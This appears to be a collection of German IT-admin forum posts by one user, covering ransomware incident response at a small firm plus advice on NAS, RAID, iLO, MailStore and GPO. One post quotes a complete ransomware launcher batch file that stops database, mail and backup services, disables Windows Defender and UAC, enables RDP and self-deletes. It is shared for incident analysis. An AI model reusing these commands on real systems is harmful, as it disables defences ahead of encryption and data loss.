Squire

No More Ransomware kannte ich schon ... zumindest scheint die SQL DB nicht verschlüsselt zu sein ... normales MDF File. Was mich jetzt ein wenig wundert ist, dass ich keinen aktiven Trojaner etc. finde ... nix in den Autorun Schlüsseln etc ... Kann das sein, dass die sich nach erfolgreichen Verschlüsseln selbst wieder rauskicken? Vielleicht ist noch was mit einem SystemRestore Point was zu holen ... ich hatte vorhin den Kunden schon mal telefonisch informiert, dass es dunkel ausschaut ... Für mich heißt das dann wohl am Wochenende ein hübsches Angebot für Server, Software, Backup, AV und Lizenzen zu machen ... das gibt es nicht für 3.50€

Incident Management ... der war gut das bin ich dann wohl selbst ich hab vorhin noch mal andere Dateien gecheckt ... CryptoXXX scheint es nicht zu sein ... da findet kein Decryptor irgendwas ... Emisoft wirft als Ransomware RAPID aus - dafür gibt es keinen decryptor. was ich bisher gefunden hab, wie er sich aktiv setzt ... wie das Teil reingekommen ist ist mir noch unklar - der Kunde behauptet nix geklickt zu haben ... ich hab folgende Datei im Download des Admins unter einem Verzeichnis RRR gefunden - die Exes hat er wohl mit einem AV Scan geschreddert del.bat @echo off START "" %~dp0\RRLL.exe -all START "" %~dp0\NS.exe START "" %~dp0\p.exe net stop MSSQLServerADHelper100 net stop MSSQL$ISARS net stop MSSQL$MSFW net stop SQLAgent$ISARS net stop SQLAgent$MSFW net stop SQLBrowser net stop ReportServer$ISARS net stop SQLWriter net stop WinDefend net stop mr2kserv net stop MSExchangeADTopology net stop MSExchangeFBA net stop MSExchangeIS net stop MSExchangeSA net stop ShadowProtectSvc net stop SPAdminV4 net stop SPTimerV4 net stop SPTraceV4 net stop SPUserCodeV4 net stop SPWriterV4 net stop SPSearch4 net stop MSSQLServerADHelper100 net stop IISADMIN net stop firebirdguardiandefaultinstance net stop ibmiasrw net stop QBCFMonitorService net stop QBVSS net stop QBPOSDBServiceV12 net stop "IBM Domino Server (CProgramFilesIBMDominodata)" net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)" net stop IISADMIN net stop "Simply Accounting Database Connection Manager" net stop QuickBooksDB1 net stop QuickBooksDB2 net stop QuickBooksDB3 net stop QuickBooksDB4 net stop QuickBooksDB5 net stop QuickBooksDB6 net stop QuickBooksDB7 net stop QuickBooksDB8 net stop QuickBooksDB9 net stop QuickBooksDB10 net stop QuickBooksDB11 net stop QuickBooksDB12 net stop QuickBooksDB13 net stop QuickBooksDB14 net stop QuickBooksDB15 net stop QuickBooksDB16 net stop QuickBooksDB17 net stop QuickBooksDB18 net stop QuickBooksDB19 net stop QuickBooksDB20 net stop QuickBooksDB21 net stop QuickBooksDB22 net stop QuickBooksDB23 net stop QuickBooksDB24 net stop QuickBooksDB25 taskkill /f /im mysql* taskkill /f /im IBM* taskkill /f /im bes10* taskkill /f /im black* taskkill /f /im sql taskkill /f /im store.exe taskkill /f /im sql* taskkill /f /im vee* taskkill /f /im postg* taskkill /f /im sage* REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f del %0

ich hab sie rausgenommen ... Werbung war das nicht

Hallo Leute, ich kann das Jahr gleich mit einer kleinen Herausforderung anfangen. Am 31.12. wurde ich von einem Neukunden angerufen, dass sein Server verschlüsselt ist ... Wie sich herrausstellte - absoluter worst case ... alles was man nicht machen sollte liegt hier vor ... Kleine Firma, die mit - festhalten - Windows 2011 HomeServer (EOL 2016) arbeitet Backup des ERP Systems liegt nur auf dem Server (auf nem 2. Raid1) Virenschutz ... irgend ein ComodoAV ... uralt von 2013 ... H-Mailserver mit Mailstore Home (nicht revisionssicher und für betriebliche Nutzung lizenzrechtlich nicht erlaubt) Es gibt kein Backup, auch kein Teilbackup. Die verschlüsselten Dateien weisen die Endung .cryptolocker auf. Laut NoRansomwareProjekt würde das auf CryptXXX V1-V3 hinweisen ... Das Entschlüsselungstool von Trendmicro versagt allerdings der Erpressertext lautet: Glück im Unglück ... es scheint, dass die SQL DB des ERP Programms nicht verschlüsselt ist ... und dass die bis 7.1. Werksurlaub haben ... ich werd die Kiste jetzt erst mal abgesichert hochfahren und die Ransomware beseitigen ... Achja ... die Polizei hat dringend davon abgeraten "Lösegeld" zu zahlen ... die wollen wohl so um die 4800$ ... hat jemand nen Tipp für eine etwaige Entschlüsselung ... ich jeweils einer der Raid1 Platten mittels einer Diskstation auf zwei Platten von mir geklont - damit kann ich dann gefahrlos testen ... Auf alle Fälle erstell ich dem Kunden dann mal ein richtiges IT Konzept und Angebot mit aktueller Hardware, Software, Virenschutz und Backup! Die Firma, die das vorher eingerichtet hat - hat schlicht und ergreifend grob fahrlässig gehandelt ... vom lizenzrechtlichen Dingen will ich mal gar nicht erst reden! ich schüttel immer noch innerlich den Kopf

ok ... musst doch nicht bis zum 7.1. warten ... VPN sei dank ... Also wir haben die Wartungsverlängerungen von CityComp

ich kann am 7.1. mal nachsehen, bei welcher Firma wir 3rd. party Maintenance gebucht haben ... wir haben ein paar Systeme nach dem Leasing rausgekauft (nach 3 Jahren) und lassen den Support dadrüber laufen.

Post warranty care packs sind relativ teuer. Es gibt aber Firmen, die sich auf so etwas spezialisiert haben... Da ist es relativ günstig

ist nicht unüblich - bei einem Rebuild wird die Quell Platte stärker gestresst als im normalen Idle Betrieb. Wenn die da schon ansatzweise ne Macke gehabt hat ... außerdem ... wie ich schon mal geschrieben hab .. ich kenn das aus eigener Erfahrung mit Fremdplatten ... (4x Samsung im Raid5 an einem HP Smartarray ... zwei gleichzeitig gestorben und kurz danach die dritte ... das Ganze bei knapp einem Jahr Laufzeit - ich hab dann neu aufgebaut mit HP Platten ... was soll ich sagen ... die laufen heute noch. Die in meinem jetzigen Server (ML350G6 - 6x300GB SAS und 2x1TB SAS) haben auch schon einige Jahre 24x7 Betrieb hinter sich

und Mailstore kostet nun wirklich nicht die Welt (im Vergleich zu anderen Lösungen sehr günstig) und DU hast alles onpremise und Du bist in der Größe des Archivs nicht limitiert ... bei 5 User kostet Mailstore pro User 59€ (1 Jahr Support - bei längeren Support entsprechend günstiger) Die Homeversion ist für die geschäftliche Nutzung lizenzrechtlich nicht zulässig.

Ich kenn die Telefone jetzt nicht, aber klassischer Weise ziehen IP Phones ihre Konfiguration via TFTP oder FTP ... sicher, dass die Telefone die Konfiguration per HTTP holen?

Bei fünf Usern würde ich auch zu einem NAS raten (vielleicht nicht gerade ein 2 Bay, sondern ein 4 Bay und vier Platten im Raid 6, der Ausfallsicherheit wegen), dazu noch ne ausreichend große USB3 HDD für die Datensicherung des NAS. Du kannst z.b. bei einem QNAP die klassischen Netzwerkdienste (DHCP, DNS, AD (Samba), File und Print) veröffentlichen ... Die Integrierte NAS Backup Funktion schreibt Dir dann noch Deine Daten als Backup auf ein USB device

dann hatte es wohl dein logisches Laufwerk zerbröselt ... also m.E. Daten weg ... neues Laufwerk anlegen und Backup zurückspielen

Mailstore

und ich werf nochmal NAS in die Runde - das ist definitiv leichter zu verwalten als ein HyperVisor inkl. VMs - in Anbetracht, dass hier wirklich allen Anschein nach die "Basic Knowledge" fehlt

naja .. den SQL könntest Du in einer VM auf dem NAS laufen lassen - oder Du schiebst Deine Datenbank in einen freien SQL Server auf das NAS ... bei einem QNAP hast Du folgende Möglichkeiten...

Wenn die Platte an einem HPE Raidcontroller hängt, reicht der bloße Austausch - Rebuild läuft alleine

ich würd mir trotzdem mal die NAS Geschichte durch den Kopf gehen lassen. Wenn Du jetzt nicht zwingend auf MSSQL angewiesen bist, sparst Du Lizenzen und CALs ... und das sind bei 20 Usern ja auch keine unerheblichen Kosten.

@Matze1708: und erzähl mal .. gibt es was Neues?

@Matze1708 ... ich hätte 12 originalverpackte und ungeöffnete iLO Advanced Lizenzen bzw. HP Insight Control FIO Suite Lizenzen (da ist iLO dabei) herumliegen Ich stimme @magheinz zu ... iLO Datenverkehr ist sensibel - das hat im normalen LAN nix verloren, sondern gehört in ein Management VLAN mit regulierten Zugriff weggesperrt. die iLO, iDRAC oder IMM hatten schon oft genug irgendwelche Sicherheitslücken ... und man möchte nicht wirklich, dass jemand darüber nen Server kapert ... ist ja schließlich wie physikalischer Zugang zur Hardware ... das will man ja auch nicht

Ich werf mal was ganz anderes in den Ring ... warum für eure Anforderungen nicht ein gutes NAS? Wieviele Benutzer arbeiten real vor Ort im Netz? QNAP z.B. bietet NAS mit der Möglichkeit darauf auch VMs laufen zu lassen ... Domänen und Netzwerkdienste kann das NAS zur Verfügung stellen, ebenfalls VPN Einwahl ... wäre m.E. eine Überlegung wert

doch genau so ... und bitte nicht die Administratoren/Buildin verwenden! Damit machst Du den User zum Admin auf allen Kisten in Deiner Domäne inklusive der Server! Wenn er denn wirklich auf seiner Kiste Admin sein soll ... händisch auf dem Rechner den jeweiligen User in die LOKALE Admin Gruppe packen. Wenn ein User/Gruppe auf den Clients Admin sein soll, dann über die Eingeschränkten Gruppen per GPO. Die User in eine Gruppe packen und die Gruppe den Admins hinzufügen ... dann natürlich nur auf die Clients anwenden!

ich hab hier noch einige freie iLO Lizenzen ... Wenn jemand die zu nem guten Kurs haben will ...

Ich hatte bisher keine Maschine ohne dedizierten ILO Port in den Finger. Was die Lizenz angeht, einfach den Buchstaben/Zahlencode notieren, der bei der advanced license angezeigt wird. Bei einem Factory reset bleibt die Lizenz normalerweise eingetragen. Der Rest wird auf default gesetzt

hat Dein DL20 keinen dedicated ILO Port?

@testperson: !# gehen definitiv @harachte Ich würde auch die VCSA empfehlen - die Windows Version des VCs fällt weg (das lässt VMware auslaufen)! Prinzipiell könntest Du ja hergehen und Dein Windows Bleck mit nem ESXi installieren - und die VCSA dadrauf packen! Der ESXi kann auch die freie Version sein. So sparst Du auch eine Windows Lizenz! Nebenbei wenn Dein SAN Storage wegbricht sind auch Deine VMs alle weg - da nützt Dir dann ein noch laufendes vCenter auch nicht weiter